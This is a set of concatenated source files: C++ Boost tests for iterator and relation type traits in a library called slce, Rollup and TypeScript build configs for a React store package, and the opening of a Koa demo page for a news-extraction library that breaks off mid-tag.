BOOST_CHECK_EQUAL( ( slce::is_predicate< callable, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< callable, int, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< predicate, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< predicate, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< relation, base, other >::value ), false );
#endif
}
BOOST_AUTO_TEST_CASE(Relation) {
#ifdef __cpp_lib_invoke
BOOST_CHECK_EQUAL( ( slce::is_relation< callable, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_relation< predicate, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_relation< relation, base, other >::value ), true );
#else
BOOST_CHECK_EQUAL( ( slce::is_relation< callable, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_relation< predicate, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_relation< relation, base, other >::value ), false );
#endif
}
BOOST_AUTO_TEST_CASE(StrictWeakOrder) {
#ifdef __cpp_lib_invoke
BOOST_CHECK_EQUAL( ( slce::is_strict_weak_order< callable, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_weak_order< predicate, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_weak_order< relation, base, other >::value ), true );
#else
BOOST_CHECK_EQUAL( ( slce::is_strict_weak_order< callable, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_weak_order< predicate, base, other >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_weak_order< relation, base, other >::value ), false );
#endif
}
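// The detail::is_cpp17_* traits classify the stub iterators against the classic
// (pre-C++20) iterator category requirements.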
BOOST_AUTO_TEST_CASE(Cpp17Iterator) {
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_iterator< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_iterator< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_iterator< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Cpp17InputIterator) {
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_input_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_input_iterator< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_input_iterator< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_input_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_input_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_input_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_input_iterator< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Cpp17ForwardIterator) {
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_forward_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_forward_iterator< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_forward_iterator< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_forward_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_forward_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_forward_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_forward_iterator< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Cpp17BidirectionalIterator) {
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_bidirectional_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_bidirectional_iterator< explicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_bidirectional_iterator< implicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_bidirectional_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_bidirectional_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_bidirectional_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_bidirectional_iterator< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Cpp17RandomAccessIterator) {
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_random_access_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_random_access_iterator< explicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_random_access_iterator< implicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_random_access_iterator< explicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_random_access_iterator< implicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_random_access_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::detail::is_cpp17_random_access_iterator< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Readable) {
BOOST_CHECK_EQUAL( ( slce::is_readable< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_readable< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_readable< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_readable< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_readable< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_readable< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_readable< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Writable) {
BOOST_CHECK_EQUAL( ( slce::is_writable< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_writable< explicit_forward_iterator, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_writable< implicit_forward_iterator, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_writable< explicit_bidirectional_iterator, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_writable< implicit_bidirectional_iterator, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_writable< explicit_random_access_iterator, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_writable< implicit_random_access_iterator, int >::value ), true );
}
BOOST_AUTO_TEST_CASE(WeaklyIncrementable) {
BOOST_CHECK_EQUAL( ( slce::is_weakly_incrementable< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_weakly_incrementable< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_weakly_incrementable< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_weakly_incrementable< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_weakly_incrementable< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_weakly_incrementable< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_weakly_incrementable< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Incrementable) {
BOOST_CHECK_EQUAL( ( slce::is_incrementable< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_incrementable< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_incrementable< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_incrementable< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_incrementable< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_incrementable< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_incrementable< implicit_random_access_iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(Iterator) {
BOOST_CHECK_EQUAL( ( slce::is_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_iterator< explicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< implicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_iterator< sentinel< explicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_iterator< sentinel< implicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_iterator< sentinel< explicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_iterator< sentinel< implicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_iterator< sentinel< explicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_iterator< sentinel< implicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_iterator< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(Sentinel) {
BOOST_CHECK_EQUAL( ( slce::is_sentinel< base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< explicit_input_iterator, explicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< implicit_input_iterator, implicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< explicit_forward_iterator, explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< implicit_forward_iterator, implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< explicit_bidirectional_iterator, explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< implicit_bidirectional_iterator, implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< explicit_random_access_iterator, explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< implicit_random_access_iterator, implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< sentinel< explicit_forward_iterator >, explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< sentinel< implicit_forward_iterator >, implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< sentinel< explicit_bidirectional_iterator >, explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< sentinel< implicit_bidirectional_iterator >, implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< sentinel< explicit_random_access_iterator >, explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< sentinel< implicit_random_access_iterator >, implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sentinel< sentinel< int* >, int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(SizedSentinel) {
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< base, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< explicit_input_iterator, explicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< implicit_input_iterator, implicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< explicit_forward_iterator, explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< implicit_forward_iterator, implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< explicit_bidirectional_iterator, explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< implicit_bidirectional_iterator, implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< explicit_random_access_iterator, explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< implicit_random_access_iterator, implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sentinel< explicit_forward_iterator >, explicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sentinel< implicit_forward_iterator >, implicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sentinel< explicit_bidirectional_iterator >, explicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sentinel< implicit_bidirectional_iterator >, implicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sentinel< explicit_random_access_iterator >, explicit_random_access_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sentinel< implicit_random_access_iterator >, implicit_random_access_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sized_sentinel< explicit_forward_iterator >, explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sized_sentinel< implicit_forward_iterator >, implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sized_sentinel< explicit_bidirectional_iterator >, explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sized_sentinel< implicit_bidirectional_iterator >, implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sized_sentinel< explicit_random_access_iterator >, explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sized_sentinel< implicit_random_access_iterator >, implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_sized_sentinel< sized_sentinel< int* >, int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(InputIterator) {
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< explicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< implicit_input_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< sentinel< explicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< sentinel< implicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< sentinel< explicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< sentinel< implicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< sentinel< explicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< sentinel< implicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_input_iterator< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(OutputIterator) {
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< base, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< explicit_output_iterator, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< implicit_output_iterator, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< explicit_non_output_iterator, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< implicit_non_output_iterator, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< sentinel< explicit_output_iterator >, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< sentinel< implicit_output_iterator >, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_output_iterator< int*, int >::value ), true );
}
BOOST_AUTO_TEST_CASE(ForwardIterator) {
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< explicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< implicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< explicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< implicit_forward_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< sentinel< explicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< sentinel< implicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< sentinel< explicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< sentinel< implicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< sentinel< explicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< sentinel< implicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_forward_iterator< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(BidirectionalIterator) {
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< explicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< implicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< explicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< implicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< explicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< implicit_bidirectional_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< sentinel< explicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< sentinel< implicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< sentinel< explicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< sentinel< implicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< sentinel< explicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< sentinel< implicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_bidirectional_iterator< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(RandomAccessIterator) {
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< explicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< implicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< explicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< implicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< explicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< implicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< explicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< implicit_random_access_iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< sentinel< explicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< sentinel< implicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< sentinel< explicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< sentinel< implicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< sentinel< explicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< sentinel< implicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_random_access_iterator< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(ContiguousIterator) {
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< explicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< implicit_input_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< explicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< implicit_forward_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< explicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< implicit_bidirectional_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< explicit_random_access_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< implicit_random_access_iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< sentinel< explicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< sentinel< implicit_forward_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< sentinel< explicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< sentinel< implicit_bidirectional_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< sentinel< explicit_random_access_iterator > >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< sentinel< implicit_random_access_iterator > >::value ), false );
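  // int* is only reported as contiguous when the library ships C++20 ranges support (__cpp_lib_ranges); earlier standards presumably lack a contiguous_iterator_tag to detect it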
#ifdef __cpp_lib_ranges
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< int* >::value ), true );
#else
BOOST_CHECK_EQUAL( ( slce::is_contiguous_iterator< int* >::value ), false );
#endif
}
BOOST_AUTO_TEST_CASE(IndirectlyMovable) {
BOOST_CHECK_EQUAL( ( slce::is_indirectly_movable< typename std::vector< non_copyable >::iterator, typename std::vector< non_copyable >::iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_movable< typename std::vector< movable >::iterator, typename std::vector< movable >::iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_movable< typename std::vector< copyable >::iterator, typename std::vector< copyable >::iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(IndirectlyCopyable) {
BOOST_CHECK_EQUAL( ( slce::is_indirectly_copyable< typename std::vector< non_copyable >::iterator, typename std::vector< non_copyable >::iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_copyable< typename std::vector< movable >::iterator, typename std::vector< movable >::iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_copyable< typename std::vector< copyable >::iterator, typename std::vector< copyable >::iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(IndirectlyCopyableStorable) {
BOOST_CHECK_EQUAL( ( slce::is_indirectly_copyable_storable< typename std::vector< non_copyable >::iterator, typename std::vector< non_copyable >::iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_copyable_storable< typename std::vector< movable >::iterator, typename std::vector< movable >::iterator >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_copyable_storable< typename std::vector< copyable >::iterator, typename std::vector< copyable >::iterator >::value ), true );
}
BOOST_AUTO_TEST_CASE(IndirectlySwappable) {
BOOST_CHECK_EQUAL( ( slce::is_indirectly_swappable< typename std::vector< non_copyable >::iterator, typename std::vector< non_copyable >::iterator >::value ), false );
#ifdef __cpp_lib_ranges
BOOST_CHECK_EQUAL( ( slce::is_indirectly_swappable< typename std::vector< movable >::iterator, typename std::vector< movable >::iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_swappable< typename std::vector< copyable >::iterator, typename std::vector< copyable >::iterator >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_indirectly_swappable< typename std::vector< base >::iterator, typename std::vector< base >::iterator >::value ), true );
#endif
}
| Fadis/slce |
<|start_filename|>rollup.config.js<|end_filename|>
import typescript from "@rollup/plugin-typescript";
import { resolve } from "path";
import ttypescript from "ttypescript";
const tsconfig = resolve(__dirname, "tsconfig.build.json");
export default {
input: "src/index.ts",
output: {
dir: "dist",
format: "es",
},
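  // ttypescript is passed in so the transformers declared in tsconfig.build.json (e.g. @zerollup/ts-transform-paths) run during compilation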
plugins: [typescript({ tsconfig, typescript: ttypescript })],
external: [
"dequal",
"react",
"is-promise",
"clone-deep",
"object-path",
"reflect-metadata",
],
};
<|start_filename|>tsconfig.build.json<|end_filename|>
{
"compilerOptions": {
"importHelpers": true,
"removeComments": true,
"emitDecoratorMetadata": true,
"experimentalDecorators": true,
"strict": true,
"strictPropertyInitialization": false,
"noImplicitAny": false,
"esModuleInterop": true,
"baseUrl": ".",
"moduleResolution": "node",
"jsx": "react",
"target": "ES6",
"rootDir": "src",
"declaration": true,
"declarationDir": "dist",
"plugins": [
{
"transform": "@zerollup/ts-transform-paths",
"exclude": ["*"]
}
]
},
"include": ["src"],
"exclude": ["src/**/*.spec.ts"]
}
| sahabpardaz/react-store |
<|start_filename|>demo/index.js<|end_filename|>
const Koa = require('koa')
const Router = require('koa-router')
const fetch = require('node-fetch')
const GeneralNewsExtractor = require('general-news-extractor')
const app = new Koa()
const router = new Router()
router.get('/', (ctx, next) => {
ctx.response.type = 'html'
ctx.body = `
<h1>GeneralNewsExtractor Demo</h1>
<div>
<ul>
<li>
<a href="http://baijiahao.baidu.com/s?id=1646431966952708911"
>http://baijiahao.baidu.com/s?id=1646431966952708911</a
>
<button onclick="handleClickOpenUrl('https://news.ifeng.com/c/7qV0OaOFL9L')">
extractor
</button>
</li>
<li>
<a href="https://news.ifeng.com/c/7qV0OaOFL9L">https://news.ifeng.com/c/7qV0OaOFL9L</a>
<button onclick="handleClickOpenUrl('https://news.ifeng.com/c/7qV0OaOFL9L')">
extractor
</button>
</li>
<li>
<a href="https://money.163.com/19/1004/08/EQKLMJVC00259DLP.html"
>https://money.163.com/19/1004/08/EQKLMJVC00259DLP.html</a
>
<button
onclick="handleClickOpenUrl('https://money.163.com/19/1004/08/EQKLMJVC00259DLP.html')"
>
extractor
</button>
</li>
<li>
<a href="https://news.sina.com.cn/c/2019-10-04/doc-iicezzrr0017275.shtml">https://news.sina.com.cn/c/2019-10-04/doc-iicezzrr0017275.shtml</a>
<button onclick="handleClickOpenUrl('https://news.sina.com.cn/c/2019-10-04/doc-iicezzrr0017275.shtml')">
extractor
</button>
</li>
<li>
<a href="https://new.qq.com/rain/a/20191004A0415600">https://new.qq.com/rain/a/20191004A0415600</a>
<button onclick="handleClickOpenUrl('https://new.qq.com/rain/a/20191004A0415600')">
extractor
</button>
</li>
<li>
<a
href="https://www.theguardian.com/sport/2019/oct/03/mlb-playoff-preview-will-the-dodgers-finally-hold-their-nerve"
